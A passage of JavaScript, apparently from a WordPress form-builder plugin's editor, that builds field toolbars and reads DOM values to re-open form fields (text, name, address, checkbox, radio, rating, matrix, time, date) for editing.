					td_PAGEUP.setAttribute("id", "page_up_"+i);
					td_PAGEUP.setAttribute("valign", "middle");
					td_PAGEUP.setAttribute("class", "element_toolbar");
					td_PAGEUP.appendChild(img_PAGEUP);
					
			var img_PAGEDOWN = document.createElement("img");
					img_PAGEDOWN.setAttribute("src", plugin_url + "/images/page_down.png");
					img_PAGEDOWN.setAttribute("title", "Move the field to the lower page");
					img_PAGEDOWN.setAttribute("onclick", 'page_down("'+i+'")');
					img_PAGEDOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"page_down")');
					img_PAGEDOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"page_down")');
					
			var td_PAGEDOWN = document.createElement("div");
					td_PAGEDOWN.setAttribute("id", "page_down_"+i);
					td_PAGEDOWN.setAttribute("valign", "middle");
					td_PAGEDOWN.setAttribute("class", "element_toolbar");
					td_PAGEDOWN.appendChild(img_PAGEDOWN);
///////////////////////////////////////////////////////////////////////////////////////////////

			
						var add1 = document.getElementById(i+'_label_sectionform_id_temp');
						var add2 = document.getElementById(i+'_element_sectionform_id_temp');
						
						wdform_field.appendChild(add1);
						wdform_field.appendChild(add2);
	
			wdform_arrows.appendChild(td_X);
			wdform_arrows.appendChild(td_LEFT);
			wdform_arrows.appendChild(td_UP);
			wdform_arrows.appendChild(td_DOWN);
			wdform_arrows.appendChild(td_RIGHT);
			wdform_arrows.appendChild(td_EDIT);
			
			if(type!="type_captcha" && type!="type_arithmetic_captcha" && type!="type_recaptcha" && type!="type_send_copy")
			{
				wdform_arrows.appendChild(td_DUBLICATE);
			}
			else			
			{
				td_DUBLICATE.removeChild(img_DUBLICATE);
				wdform_arrows.appendChild(td_DUBLICATE);
			}
			
			wdform_arrows.appendChild(td_PAGEUP);
			wdform_arrows.appendChild(td_PAGEDOWN);
			
			if(document.getElementById('pos_end').checked)
			{
				wdform_column.appendChild(wdform_row);
			}
			if(document.getElementById('pos_begin').checked)
			{	
				wdform_column.insertBefore(wdform_row, wdform_column.firstChild);
			}
			if(document.getElementById('pos_before').checked)
			{	

				beforeTr=document.getElementById("wdform_field"+document.getElementById('sel_el_pos').value).parentNode;
				wdform_column=beforeTr.parentNode;
				beforeOption=document.getElementById(document.getElementById('sel_el_pos').value+'_sel_el_pos');
				wdform_column.insertBefore(wdform_row, beforeTr);
				select_.insertBefore(option, beforeOption);
			}
			j=2;
			close_window() ;
		call(i,key);
		
		}
	}	
	}
		else
		{
			alert("The field label is required.");
			return;
		}
	
/*	undo_redo.push(document.getElementById('take').innerHTML);
	undo_redo_num++;*/
	}			
	else alert("Please select an element to add.");
  if(document.getElementById('enable_sortable').value==1)
		jQuery( ".wdform_arrows" ).hide();

	jQuery(".wdform_page input[type='text'], .wdform_page input[type='password'], .wdform_page input[type='file'], .wdform_page textarea, .wdform_page input[type='checkbox'], .wdform_page input[type='radio'], .wdform_page select").prop("disabled", true);

}

function call(i,key)
{
	need_enable=false;
	after_edit= false;
	if(key==0)
	{
		if(document.getElementById("pos_end").getAttribute('disabled')=='disabled')
			after_edit= true;
		edit(i);
		add('1',after_edit, i);
	}
	need_enable=true;
}

function edit_page_break(id)
{
		enable2();
		
	document.getElementById('editing_id').value=id;

		form_view_element	=document.getElementById('form_id_tempform_view'+id);
		page_title			=form_view_element.getAttribute('page_title');
		if(form_view_element.getAttribute('next_title'))
		{
			next_title			=form_view_element.getAttribute('next_title');
			next_type			=form_view_element.getAttribute('next_type');
			next_class			=form_view_element.getAttribute('next_class');
			next_checkable		=form_view_element.getAttribute('next_checkable');
			previous_title		=form_view_element.getAttribute('previous_title');
			previous_type		=form_view_element.getAttribute('previous_type');
			previous_class		=form_view_element.getAttribute('previous_class');
			previous_checkable	=form_view_element.getAttribute('previous_checkable');
			w_title	=[ next_title, previous_title];
			w_type	=[next_type,previous_type];
			w_class	=[next_class,previous_class];
			w_check	=[next_checkable,previous_checkable];
		}
		else
		{
			w_title	=[ "Next","Previous"];
			w_type	=["text","text"];
			w_class	=["",""];
			w_check	=['true', 'true'];
		}
		
	
	//atrs=return_attributes('form_id_tempform_view'+id);
	w_attr_name=[];
	w_attr_value=[];
	type_page_break(id, page_title , w_title, w_type, w_class, w_check, w_attr_name, w_attr_value);

}

function edit(id)
{
	if(need_enable)
		enable2();
	
	document.getElementById('editing_id').value=id;
	type=document.getElementById("wdform_field"+id).getAttribute('type');
	
	
	//////////////////////////////parameter take
	k=0;
	
	w_choices=new Array();	
	w_choices_value=new Array();
	w_choices_params=new Array();
	w_choices_checked=new Array();
	w_choices_disabled=new Array();
	w_allow_other_num=0;
	w_property=new Array();	

	w_property_values=new Array();
	w_choices_price=new Array();

	t=0;
	
	/////////shat handipox
	
	if(document.getElementById(id+'_element_labelform_id_temp').innerHTML)
		w_field_label=document.getElementById(id+'_element_labelform_id_temp').innerHTML;
  else
    w_field_label=" ";
		
	if(document.getElementById(id+'_label_sectionform_id_temp'))
	if(document.getElementById(id+'_label_sectionform_id_temp').style.display=="block")
		w_field_label_pos="top";
	else
		w_field_label_pos="left";
		
	if(document.getElementById(id+"_elementform_id_temp"))
	{
		s=document.getElementById(id+"_elementform_id_temp").style.width;
		 w_size=s.substring(0,s.length-2);
	}
	
	if(document.getElementById(id+"_label_sectionform_id_temp"))
	{
		s=document.getElementById(id+"_label_sectionform_id_temp").style.width;
		w_field_label_size=s.substring(0,s.length-2);
	}
	
	if(document.getElementById(id+"_requiredform_id_temp"))
	  	w_required=document.getElementById(id+"_requiredform_id_temp").value;
		
	if(document.getElementById(id+"_uniqueform_id_temp"))
	  	w_unique=document.getElementById(id+"_uniqueform_id_temp").value;
		
	if(document.getElementById(id+'_label_sectionform_id_temp'))
	{
		w_class=document.getElementById(id+'_label_sectionform_id_temp').getAttribute("class");
		if(!w_class)
			w_class="";
	}
		

	switch(type)
		{
			case 'type_editor':
			{
				w_editor=document.getElementById("wdform_field"+id).innerHTML;
				type_editor(id, w_editor); break;
			}
			case 'type_section_break':
			{
				w_editor=document.getElementById(id+"_element_sectionform_id_temp").innerHTML;
				type_section_break(id, w_editor); break;
			}
			case 'type_send_copy':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").checked;
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_send_copy(id, w_field_label, w_field_label_size, w_field_label_pos, w_first_val, w_required, w_attr_name, w_attr_value); break;
			}
			case 'type_text':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				w_regExp_status = document.getElementById(id+"_regExpStatusform_id_temp").value;
				w_regExp_value = unescape(document.getElementById(id+"_regExp_valueform_id_temp").value);
				w_regExp_common = document.getElementById(id+"_regExp_commonform_id_temp").value;
				w_regExp_arg = document.getElementById(id+"_regArgumentform_id_temp").value;
				w_regExp_alert = document.getElementById(id+"_regExp_alertform_id_temp").value;
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_text(id, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_regExp_status, w_regExp_value, w_regExp_common, w_regExp_arg, w_regExp_alert, w_unique, w_attr_name, w_attr_value); break;
			}
			case 'type_number':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_number(id, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class,  w_attr_name, w_attr_value); break;
			}
			case 'type_password':
			{
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_password(id, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_textarea':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
				s=document.getElementById(id+"_elementform_id_temp").style.height;
				w_size_h=s.substring(0,s.length-2);

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_textarea(id, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_size_h, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			
			case 'type_wdeditor':
			{

				w_title=document.getElementById(id+"_elementform_id_temp").title;
				s=document.getElementById(id+"_elementform_id_temp").style.height;
				w_size_h=s.substring(0,s.length-2);
				w=document.getElementById(id+"_elementform_id_temp").style.width;
				w_size_w=w.substring(0,w.length-2);

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_wdeditor(id, w_field_label, w_field_label_size, w_field_label_pos, w_size_w, w_size_h, w_title, w_required, w_class, w_attr_name, w_attr_value); break;
			}
			
			case 'type_phone':
			{
				w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
				w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
				s=document.getElementById(id+"_element_lastform_id_temp").style.width;
				w_size=s.substring(0,s.length-2);

				w_mini_labels= [document.getElementById(id+"_mini_label_area_code").innerHTML, document.getElementById(id+"_mini_label_phone_number").innerHTML];

				atrs=return_attributes(id+'_element_firstform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_phone(id, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_mini_labels, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_name':
			{
				if(document.getElementById(id+"_enable_fieldsform_id_temp")) {
					w_name_format="normal";
				
					w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
					w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
					
					var title_middle = ['title', 'middle'];
					for(var l=0; l<2; l++)
					{
						w_first_val.push(document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp') ? document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp').value : '');
						w_title.push(document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp') ? document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp').title : '');
					}
					
				}
				else
				{
					if(document.getElementById(id+'_element_middleform_id_temp'))
						w_name_format="extended";
					else
						w_name_format="normal";

					if(w_name_format=="normal")	{
						w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
						w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
					}
					else {
						w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value, document.getElementById(id+"_element_titleform_id_temp").value, document.getElementById(id+"_element_middleform_id_temp").value];
						w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title, document.getElementById(id+"_element_titleform_id_temp").title,document.getElementById(id+"_element_middleform_id_temp").title];
					}
				}
	
				if(document.getElementById(id+"_mini_label_title"))
					w_mini_title = document.getElementById(id+"_mini_label_title").innerHTML;
				else
					w_mini_title = "Title";
			
				if(document.getElementById(id+"_mini_label_middle"))
					w_mini_middle = document.getElementById(id+"_mini_label_middle").innerHTML;
				else
					w_mini_middle = "Middle";
				
				w_mini_labels = [w_mini_title, document.getElementById(id+"_mini_label_first").innerHTML,document.getElementById(id+"_mini_label_last").innerHTML, w_mini_middle];
				w_name_title = 	document.getElementById(id+'_enable_fieldsform_id_temp') ? document.getElementById(id+'_enable_fieldsform_id_temp').getAttribute('title') : (w_name_format=="normal" ? 'no' : 'yes');			
				w_name_middle = document.getElementById(id+'_enable_fieldsform_id_temp') ? document.getElementById(id+'_enable_fieldsform_id_temp').getAttribute('middle') : (w_name_format=="normal" ? 'no' : 'yes');			
				w_name_fields = [w_name_title, w_name_middle]; 	    
				 
				s=document.getElementById(id+"_element_firstform_id_temp").style.width;
				w_size=s.substring(0,s.length-2);
				atrs=return_attributes(id+'_element_firstform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				
				type_name(id, w_field_label, w_field_label_size, w_field_label_pos,w_first_val, w_title, w_mini_labels,  w_size, w_name_format, w_required, w_unique, w_class, w_attr_name, w_attr_value, w_name_fields);break;
			}
			
			case 'type_address':
			{
				s=document.getElementById(id+"_div_address").style.width;
				w_size=s.substring(0,s.length-2);


				if(document.getElementById(id+"_mini_label_street1"))
					w_street1= document.getElementById(id+"_mini_label_street1").innerHTML; 
				else
					w_street1 = document.getElementById(id+"_street1form_id_temp").value;
					
					
				if(document.getElementById(id+"_mini_label_street2"))
					w_street2= document.getElementById(id+"_mini_label_street2").innerHTML;
				else
					w_street2 = document.getElementById(id+"_street2form_id_temp").value;	
					
				if(document.getElementById(id+"_mini_label_city"))
					w_city= document.getElementById(id+"_mini_label_city").innerHTML;
				else
					w_city = document.getElementById(id+"_cityform_id_temp").value;					
					
				if(document.getElementById(id+"_mini_label_state"))
					w_state= document.getElementById(id+"_mini_label_state").innerHTML; 
				else
					w_state = document.getElementById(id+"_stateform_id_temp").value;	
					
				if(document.getElementById(id+"_mini_label_postal"))
					w_postal= document.getElementById(id+"_mini_label_postal").innerHTML; 
				else
					w_postal = document.getElementById(id+"_postalform_id_temp").value;	
					
				if(document.getElementById(id+"_mini_label_country"))
					w_country= document.getElementById(id+"_mini_label_country").innerHTML; 
				else
					w_country = document.getElementById(id+"_countryform_id_temp").value;					
					
				w_mini_labels=[w_street1, w_street2, w_city, w_state, w_postal, w_country];


				var disabled_input = document.getElementById(id+"_disable_fieldsform_id_temp");
				
					w_street1_dis= disabled_input.getAttribute('street1');
					w_street2_dis= disabled_input.getAttribute('street2');
					w_city_dis= disabled_input.getAttribute('city');
					w_state_dis= disabled_input.getAttribute('state');
					w_us_states_dis= disabled_input.getAttribute('us_states');
					w_postal_dis= disabled_input.getAttribute('postal');
					w_country_dis= disabled_input.getAttribute('country');
				
						
				w_disabled_fields=[w_street1_dis, w_street2_dis, w_city_dis, w_state_dis,  w_postal_dis, w_country_dis,w_us_states_dis];

				
				atrs=return_attributes(id+'_street1form_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_address(id, w_field_label, w_field_label_size, w_field_label_pos, w_size,  w_mini_labels, w_disabled_fields, w_required, w_class, w_attr_name, w_attr_value); break;
			}

			case 'type_submitter_mail':
			{
				w_first_val=document.getElementById(id+"_elementform_id_temp").value;
				w_title=document.getElementById(id+"_elementform_id_temp").title;
		
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_submitter_mail(id, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_checkbox':
			{	

				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

				if(document.getElementById(id+"_rowcol_numform_id_temp").value)	
				{
				
                if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";				
				w_rowcol = 	document.getElementById(id+"_rowcol_numform_id_temp").value;
				}
				else
				{
					if(document.getElementById(id+'_hor'))
						w_flow="hor"	
					else
						w_flow="ver";
					
					w_rowcol = 1;
				}
				
				v=0;
				if(w_flow=="ver")
				{
					var table_little = document.getElementById(id+'_table_little');
					for(k=0;k < table_little.childNodes.length; k++)
					{
						var td_little = table_little.childNodes[k];
							for(m=0; m < td_little.childNodes.length; m++)
							{
								var idi = td_little.childNodes[m].getAttribute('idi');
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
									if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
										w_allow_other_num=t;
								w_choices[t]=document.getElementById(id+"_label_element"+idi).innerHTML;
								w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
								w_choices_value[t]=document.getElementById(id+"_elementform_id_temp"+idi).value;
								if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
									w_choices_params[t]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
								else
									w_choices_params[t]='';
								t++;
								v=idi;
							}
					}
				
				}
				else
				{
					var table_little = document.getElementById(id+'_table_little');
					var	tr_little = table_little.childNodes;
					var td_max = tr_little[0].childNodes;
					
					for(k=0;k < td_max.length; k++)
					{
						for(m=0; m < tr_little.length; m++)
						{
							if(tr_little[m].childNodes[k])
							{
								var td_little = tr_little[m].childNodes[k];
								var idi = td_little.getAttribute('idi');
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
									if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
										w_allow_other_num=t;
								w_choices[t]=document.getElementById(id+"_label_element"+idi).innerHTML;
								w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
								w_choices_value[t]=document.getElementById(id+"_elementform_id_temp"+idi).value;
								if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
									w_choices_params[t]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
								else
									w_choices_params[t]='';
								t++;
								v=idi;
							}
						}
					}
				
				}
					
				if(document.getElementById(id+"_option_left_right"))
					w_field_option_pos = document.getElementById(id+"_option_left_right").value;
				else
					w_field_option_pos = 'left';

				w_value_disabled = document.getElementById(id+"_value_disabledform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_checkbox(id, w_field_label,w_field_label_size, w_field_label_pos, w_field_option_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value, w_value_disabled, w_choices_value, w_choices_params); break;
			}
			
			
			case 'type_radio':
			{	
		
				w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
				w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

				if(document.getElementById(id+"_rowcol_numform_id_temp").value)	
				{
				
                if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";				
				w_rowcol = 	document.getElementById(id+"_rowcol_numform_id_temp").value;
				}
				else
				{
					if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
						w_flow="hor"	
					else
						w_flow="ver";
					
					w_rowcol = 1;
				}
				
				v=0;
				if(w_flow=="ver")
				{	
					var table_little = document.getElementById(id+'_table_little');
					for(k=0;k < table_little.childNodes.length; k++)
					{
						var td_little = table_little.childNodes[k];
							for(m=0; m < td_little.childNodes.length; m++)
							{
								var idi = td_little.childNodes[m].getAttribute('idi');
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
									if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
										w_allow_other_num=t;
								w_choices[t]=document.getElementById(id+"_label_element"+idi).innerHTML;
								w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
								w_choices_value[t]=document.getElementById(id+"_elementform_id_temp"+idi).value;
								if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
									w_choices_params[t]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
								else
									w_choices_params[t]='';
								t++;
								v=idi;
							}
					}
				}
				else
				{
					var table_little = document.getElementById(id+'_table_little');
					var	tr_little = table_little.childNodes;
					var td_max = tr_little[0].childNodes;
					
					for(k=0;k < td_max.length; k++)
					{
						for(m=0; m < tr_little.length; m++)
						{
							if(tr_little[m].childNodes[k])
							{
								var td_little = tr_little[m].childNodes[k];
								var idi = td_little.getAttribute('idi');
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
									if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
										w_allow_other_num=t;
								w_choices[t]=document.getElementById(id+"_label_element"+idi).innerHTML;
								w_choices_checked[t]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
								w_choices_value[t]=document.getElementById(id+"_elementform_id_temp"+idi).value;
								if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
									w_choices_params[t]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
								else
									w_choices_params[t]='';
								t++;
								v=idi;
							}
						}
					}
				
				}

				if(document.getElementById(id+"_option_left_right"))
					w_field_option_pos = document.getElementById(id+"_option_left_right").value;
				else
					w_field_option_pos = 'left';
				
				w_value_disabled = document.getElementById(id+"_value_disabledform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_radio(id, w_field_label, w_field_label_size, w_field_label_pos, w_field_option_pos, w_flow, w_choices, w_choices_checked, w_rowcol, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value, w_value_disabled, w_choices_value, w_choices_params); break;
			}
			
		
			
			case 'type_star_rating':
			{
				w_star_amount  = document.getElementById(id+"_star_amountform_id_temp").value;
				w_field_label_col  = document.getElementById(id+"_star_colorform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_star_rating(id, w_field_label, w_field_label_size, w_field_label_pos, w_field_label_col, w_star_amount, w_required, w_class, w_attr_name, w_attr_value) ; break;
			}
			
			case 'type_scale_rating':
			{
				w_mini_labels  =[document.getElementById(id+"_mini_label_worst").innerHTML,document.getElementById(id+"_mini_label_best").innerHTML];	
			
				w_scale_amount = document.getElementById(id+"_scale_amountform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_scale_rating(id, w_field_label, w_field_label_size, w_field_label_pos, w_mini_labels,  w_scale_amount, w_required, w_class, w_attr_name, w_attr_value) ; break;
			}
			
			case 'type_spinner':
			{
				w_field_min_value  = document.getElementById(id+"_min_valueform_id_temp").value;
				w_field_max_value  = document.getElementById(id+"_max_valueform_id_temp").value;
				w_field_width  = document.getElementById(id+"_spinner_widthform_id_temp").value;
				w_field_step = document.getElementById(id+"_stepform_id_temp").value;
				w_field_value  = document.getElementById(id+"_elementform_id_temp").getAttribute("aria-valuenow");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_spinner(id, w_field_label, w_field_label_size, w_field_label_pos, w_field_width, w_field_min_value, w_field_max_value, w_field_step, w_field_value, w_required, w_class, w_attr_name, w_attr_value) ; break;
			
			
			}
			
			case 'type_slider':
			{
				w_field_min_value  = document.getElementById(id+"_slider_min_valueform_id_temp").value;
				w_field_max_value  = document.getElementById(id+"_slider_max_valueform_id_temp").value;
				w_field_width  = document.getElementById(id+"_slider_widthform_id_temp").value;
				w_field_value  = document.getElementById(id+"_slider_valueform_id_temp").value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_slider(id, w_field_label, w_field_label_size, w_field_label_pos,  w_field_width, w_field_min_value, w_field_max_value, w_field_value, w_required, w_class, w_attr_name, w_attr_value); break;
			}
			
			case 'type_range':
			{
				
				w_field_range_width  = document.getElementById(id+"_range_widthform_id_temp").value;
				w_field_range_step = document.getElementById(id+"_range_stepform_id_temp").value;
				
				w_field_value1  = document.getElementById(id+"_elementform_id_temp0").getAttribute("aria-valuenow");
				w_field_value2  = document.getElementById(id+"_elementform_id_temp1").getAttribute("aria-valuenow");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				w_mini_labels = [document.getElementById(id+"_mini_label_from").innerHTML,document.getElementById(id+"_mini_label_to").innerHTML]; 	 
				
				type_range(id, w_field_label, w_field_label_size, w_field_label_pos, w_field_range_width, w_field_range_step, w_field_value1, w_field_value2, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value) ;  break;
			
			}
			case 'type_grading':
			{
			
				w_total = document.getElementById(id+"_grading_totalform_id_temp").value;
				w_items=[];
				
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp"+k))
					{
						
						w_items.push(document.getElementById(id+"_label_elementform_id_temp"+k).innerHTML);
						
					}
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				
				type_grading(id, w_field_label, w_field_label_size, w_field_label_pos, w_items, w_total, w_required, w_class, w_attr_name, w_attr_value) ; refresh_grading_items(id); break;
			
			
			}
			case 'type_matrix':
			{	
                w_rows=[];
				w_rows[0]="";
				for(k=1;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp"+k+"_0"))
					{
						
						w_rows.push(document.getElementById(id+"_label_elementform_id_temp"+k+"_0").innerHTML);
						
					}
			
			    w_columns=[];
				w_columns[0]="";
				for(k=1;k<100;k++)
					if(document.getElementById(id+"_label_elementform_id_temp0_"+k))
					{
						
						w_columns.push(document.getElementById(id+"_label_elementform_id_temp0_"+k).innerHTML);
						
					}
					
			w_field_input_type = document.getElementById(id+"_input_typeform_id_temp").value;		
			w_textbox_size = document.getElementById(id+"_textbox_sizeform_id_temp") ? document.getElementById(id+"_textbox_sizeform_id_temp").value : '100';			
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			type_matrix(id, w_field_label, w_field_label_size, w_field_label_pos, w_field_input_type, w_rows, w_columns, w_required, w_class, w_attr_name, w_attr_value, w_textbox_size); refresh_matrix(id); break; 
			
			
			}
		
			
			case 'type_time':
			{	
				atrs=return_attributes(id+'_hhform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_hh=document.getElementById(id+'_hhform_id_temp').value;
				w_mm=document.getElementById(id+'_mmform_id_temp').value;
				if(document.getElementById(id+'_ssform_id_temp'))
				{
					w_ss=document.getElementById(id+'_ssform_id_temp').value;
					w_sec="1";
					w_mini_label_ss=document.getElementById(id+'_mini_label_ss').innerHTML;
				}
				else
				{
					w_ss="";
					w_sec="0";
					w_mini_label_ss='';
				}
				if(document.getElementById(id+'_am_pm_select'))
				{
					w_am_pm=document.getElementById(id+'_am_pmform_id_temp').value;
					w_time_type="12";
					w_mini_labels = [document.getElementById(id+'_mini_label_hh').innerHTML, document.getElementById(id+'_mini_label_mm').innerHTML, w_mini_label_ss, document.getElementById(id+'_mini_label_am_pm').innerHTML];
		
				}
				else
				{
					w_am_pm=0;
					w_time_type="24";
					w_mini_labels = [document.getElementById(id+'_mini_label_hh').innerHTML, document.getElementById(id+'_mini_label_mm').innerHTML, w_mini_label_ss ,'AM/PM'];
			
				}
				type_time(id, w_field_label, w_field_label_size, w_field_label_pos, w_time_type, w_am_pm, w_sec, w_hh, w_mm, w_ss, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_date':
			{	
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_date=document.getElementById(id+'_elementform_id_temp').value;
				w_format=document.getElementById(id+'_buttonform_id_temp').getAttribute("format");
				w_but_val=document.getElementById(id+'_buttonform_id_temp').value;
				w_disable_past_days = document.getElementById(id+'_dis_past_daysform_id_temp') ? document.getElementById(id+'_dis_past_daysform_id_temp').value : 'no';
				type_date(id, w_field_label, w_field_label_size, w_field_label_pos, w_date, w_required, w_class, w_format, w_but_val, w_attr_name, w_attr_value,w_disable_past_days); break;
			}
			case 'type_date_fields':
			{	
				atrs			=return_attributes(id+'_dayform_id_temp');
				w_attr_name		=atrs[0];
				w_attr_value	=atrs[1];
				w_day			=document.getElementById(id+'_dayform_id_temp').value;
				w_month			=document.getElementById(id+'_monthform_id_temp').value;
				w_year			=document.getElementById(id+'_yearform_id_temp').value;
				w_day_type		=document.getElementById(id+'_dayform_id_temp').tagName;
				w_month_type	=document.getElementById(id+'_monthform_id_temp').tagName;
				w_year_type		=document.getElementById(id+'_yearform_id_temp').tagName;
				w_day_label		=document.getElementById(id+'_day_label').innerHTML;
				w_month_label	=document.getElementById(id+'_month_label').innerHTML;
				w_year_label	=document.getElementById(id+'_year_label').innerHTML;
				
				s				=document.getElementById(id+'_dayform_id_temp').style.width;
				w_day_size		=s.substring(0,s.length-2);
				
				s				=document.getElementById(id+'_monthform_id_temp').style.width;
				w_month_size	=s.substring(0,s.length-2);
				
				s				=document.getElementById(id+'_yearform_id_temp').style.width;
				w_year_size		=s.substring(0,s.length-2);
				
				w_from			=document.getElementById(id+'_yearform_id_temp').getAttribute('from');
				w_to			=document.getElementById(id+'_yearform_id_temp').getAttribute('to');
				w_divider		=document.getElementById(id+'_separator1').innerHTML;
